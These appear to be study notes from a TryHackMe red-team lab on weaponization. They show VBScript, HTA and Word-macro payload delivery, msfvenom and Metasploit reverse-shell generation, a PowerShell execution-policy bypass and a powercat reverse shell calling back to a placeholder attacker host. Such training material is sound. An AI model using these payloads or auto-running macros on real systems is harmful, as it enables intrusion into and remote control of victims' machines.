Weaponization

Weaponizatiion is when red teamers use their own crafted tools to exploit a target

Windows Scripting Host (WSH)

Windows scripting host is a built-in Windows administration tool that runs batch files to automate and manage tasks within the operating system. It uses VBScript

Showing a message box

• Windows message box

  Dim message
  message = "Hello"
  MsgBox message

• run it in cmd: wscript hello.vbs

Use it to run exe files

• Run an exe file with VBScript

  Set shell = WScript.CreateObject("Wscript.Shell")
  shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

• Execute it with wscript or cscript in cmd: wscript c:\Users\thm\Desktop\calc.vbs or cscript.exe c:\Users\thm\Desktop\calc.vbs

• In case of blacklist, possible to rename in txt and still run it: wscript /e:VBScript c:\Users\thm\Desktop\payload.txt

HTML Application (HTA)

Using and `ActiveXObject to execute cmd.exe

<html>
<body>
<script>
        var c= 'cmd.exe'
        new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

• serve the payload python3 -m http.server 8000

• Visit the page from the target machine http://IP-ATTACK-MACHINE:8000/payload.hta and run it

Reverse shell

• Create a reverse shell with msfvenom msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP-ATTACK-MACHINE LPORT=443 -f hta-psh -o thm.hta

• Launch a listener: nc -lvp 443

• The reverse shell is launched when the link is visited from the target machine

• Possible to generate and serve HTA with Metasploit framework use exploit/windows/misc/hta_serverand we need to set LHOST, LPORT, SRVHOST, Payload we can use this payload windows/meterpreter/reverse_tcp

• When the link is visited in the target we get a meterpreter shell

Visual Basic for Application (VBA)

• We need to use Word

• We open Visual Basic Editor by selecting view → macros

• We can give a name to our macro and click create

• We then can make another message box

Sub MACRONAME()
  MsgBox ("Message in a box")
End Sub

• We run the macro with F5

• To execute it automatically we can use after the document is open we need to use AutoOpen and Document_open

Sub Document_Open()
  MACRONAME
End Sub

Sub AutoOpen()
  MACRONAME
End Sub

Sub MACRONAME()
  MsgBox ("Message in a box")
End Sub

• we save the document in docm or doc

Execute a bin

Sub ExecBin()
        Dim payload As String
        payload = "calc.exe"
        CreateObject("Wscript.Shell").Run payload,0
End Sub

Use msfvenom for VBA

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKING-MACHINE-IP LPORT=443 -f vba

• We just need to copy the output in the file

• We set the listener with msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp we set also LHOST and LPORT

• When the doc is open in the target machine we get a shell

PowerShell

• Write something with powershell we open a text editor and put this inside: Write-Output "something"

• We save the file with .PS1 extension

• We can execute it from the cmd: powershell -File thm.ps1

Execution policy

• See if we are restricted: Get-ExecutionPolicy

• Change it: Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

• we can also bypassing when executing the script: powershell -ex bypass -File script.ps1

Getting a reverse shell

• We can use powercat

• We set up a listener nc -lvp 443

• We launch powercat powershell -c "powercat -c ATTACKING-MACHINE-IPP -p 443 -e cmd"

• We should get a shell

A great tool to generate reverse shell payloads

• Revshells.com

Resources

TryHackMe | Cyber Security TrainingTryHackMe

TryHackMe - Weaponization

GitHub - infosecn1nja/Red-Teaming-Toolkit: This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.GitHub

Red Teaming Toolkit - infosecn1nja